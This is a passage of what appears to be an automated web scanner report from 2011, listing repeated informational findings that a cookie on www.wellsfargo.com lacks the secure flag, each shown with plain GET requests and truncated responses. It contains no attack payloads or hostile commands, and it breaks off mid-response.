ISD_WCM_COOKIE=2331269898.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/retirement/openira/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:50 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=YJV8NJhdhdMLGnSv274NzJTQHrvNQ2n3CBLWGMBzrdc8XGhTGsbN!-1672152970; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Open an IRA (Individual Retire ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=1693735690.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jump/about/fdic HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:08 GMT
Content-length: 9678
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=x1trNJhJGTGqVyL185v7GXzvQBCvYpMvVYwVg3sGTsGMgTVGz2YG!-1408825807; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1693735690.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2448710410.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jump/applications/inprogress HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:07 GMT
Content-length: 4747
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=6WsvNJhTXvxJ1jsxDf1m1Gy1rlbWnMwpT7vJFPgxrMwwt58cy9lN!-213655893; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2448710410.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2398378762.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jump/wachovia/EFS/WAC1 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:05 GMT
Content-length: 6663
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=LfRNNJhRvn61Cp8bXrFGLwg6QQKWryy89ht4J427MtcBftWn8JsH!898739336; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2398378762.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2180274954.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jump/wachovia/insurance/identity HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:06 GMT
Content-length: 6816
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=L8vkNJhRGXvkQ866j1p1HL661fxkJ10Hh3p3z1R94dLrvJqJY68V!854257767; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jump/wachovia/mortgage/firsttimebuyer?dm=DMIWEWACP5 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2079611658.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /locator HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:19 GMT
Location: https://www.wellsfargo.com/locator/
Set-Cookie: ISD_WCM_COOKIE=2079611658.16927.0000; path=/
Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/locator ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=1777621770.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /locator/atm/preSearch HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:19 GMT
Content-type: text/html
Cache-Control: no-cache="Set-Cookie"
Location: https://www.wellsfargo.com/locator/atm/search
Set-Cookie: wcmcookieloc=NGyJNJhfZkJQBpWrs3zCZbWZdbfpMmq2j01SwVrYQ028TBgjR5nW!-1273606700; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1777621770.16927.0000; path=/
Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/locator ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2398378762.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /locator/atm/search HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:17 GMT
Content-type: text/html; charset=ISO-8859-1
Cache-Control: no-cache="Set-Cookie"
Set-Cookie: wcmcookieloc=mdg4NJhdq2DWYbbpdNp9BF000vJcqLG9gHCnvKSjFpn4l8Jr1tl9!898739336; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2398378762.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2163497738.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgage/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:41 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=9VjQNJhV9tfpnq1TVd2hsJPwPGsqdkCgbFhYGJsJTrttBpTLdsjY!-705334509; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2163497738.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /mortgage/rates?dm=DMIWFHPRAT HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:43 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=fZ0GNJhXbp9NkTTBKxLLgWdBC8515ftXhHp83yTlYbMCkvhQHzFT!-1408825807; domain=.wellsfargo.com; path=/; secure
Set-Cookie: dm=DMIWFHPRAT; domain=.wellsfargo.com; expires=Friday, 04-Mar-2011 22:29:43 GMT; path=/
Content-Language: en
Set-Cookie: ISD_WCM_COOKIE=1693735690.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Home Mortgage - To ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=1827953418.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /online_brokerage/education/trading/volatile/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:30:01 GMT
Content-type: text/html; charset=ISO-8859-1
Set-Cookie: wcmcookiewf=C7mMNJhJpXQ7FGYBpppzvY2tZP2qr0klzqyBTrZnLhD8HsmsB5nr!-427629300; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1827953418.16927.0000; path=/
Connection: close
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2431933194.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /per/more/banking HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:39 GMT
Content-length: 10949
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=mFfWNJhTM3LCLw1nwcXCmgZQLT7M2yhK3vfsDDQBTdRL5f6czJbj!1127287699; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2431933194.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Banking Overview</ ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2096388874.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /per/more/loans_credit HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:40 GMT
Content-length: 10611
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=LlvBNJhJC3mhJb9Rgj7RS9w1WVHnp24RLXcRh0pK5HRNch3Gxxnz!1697366244; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2096388874.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2566150922.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_credit/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:47 GMT
Content-length: 7834
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=S850NJhbvFyXKFsqjRkSJvyZ8MVlMvnnZvZ8BtWvJdLCFxx1ZSxH!-887259216; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2566150922.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head> <title>Wells Fargo - Personal C ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2180274954.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_credit/rate_payments/rate_calc_main HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:48 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=TC2fNJhcJvc8bQh2DP2GHJBG108y42PYVj4VDGmL2nJ0bZdjh3Lq!854257767; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo ... Rate & Payment ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2062834442.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy_security/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:31 GMT
Content-length: 7654
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=5MdgNJhLPQJrJbQL2dj2np2B79whD7Gkrq9kkphmPHd9S35MYVGj!457746116; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Privacy & Security ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2633259786.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy_security/fraud/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:29 GMT
Content-length: 7546
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=yVv2NJhJb35jxN6JYsp0LJR40jSkyXq8BL1vVYQycy3X5yBqpGnH!-1164025042; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2633259786.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2264161034.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy_security/fraud/report/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:27 GMT
Content-length: 6368
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=vJxpNJhHLn21ThPNMCWcdb7TJvhkn1h6BwPSlv9wX4vqvRzqm8Cv!312685559; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2264161034.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Privacy and Securi ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2448710410.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy_security/fraud/report/fraud HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:29 GMT
Content-length: 5794
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=sGGJNJhJvdHFzNC5MkDQXh52s09R1dnm7LNy8v1BGT8qQTbWpMvl!-213655893; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2448710410.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Privacy and Securi ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=1811176202.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy_security/online/guarantee HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:31 GMT
Content-length: 7173
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=ZWxLNJhLlFLsVdPS3Q2mcXf3Hh6RcqmGMcp1f68BhHGpyYSdLNJr!-180776916; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1811176202.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Privacy and Securi ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2616482570.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products_services/HE_selector HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:58 GMT
Location: https://www.wellsfargo.com/customerApp/jsp/products_services/HE_selector.jsp
Set-Cookie: wcmcookiewf=Z24pNJhG811khdlryT1wFK10GQBcQnR52yn1FwnyvQyZpkwyblxT!-1966973819; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2616482570.16927.0000; path=/
Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/custome ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2348047114.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products_services/applications_viewall HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:59 GMT
